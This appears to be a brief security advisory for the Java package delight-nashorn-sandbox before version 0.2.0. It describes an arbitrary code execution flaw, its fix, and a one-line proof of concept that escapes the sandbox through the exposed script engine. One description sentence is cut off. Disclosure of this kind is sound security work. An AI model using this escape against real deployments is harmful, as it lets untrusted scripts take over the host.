Arbitrary Code Execution Affecting org.javadelight:delight-nashorn-sandbox package, versions [,0.2.0)
4 May 2021
3 May 2021
Max Rohde, Anthony Weems
Introduced: 3 May 2021
CWE-94
How to fix?
Upgrade org.javadelight:delight-nashorn-sandbox to version 0.2.0 or higher.
Affected versions of this package are vulnerable to Arbitrary Code Execution. It exposes an instance of NashornScriptEngine through the
Proof of concept
sandbox.eval("delete this.engine; this.engine.factory.scriptEngine.compile('var File = Java.type(\"java.io.File\"); File;').eval()");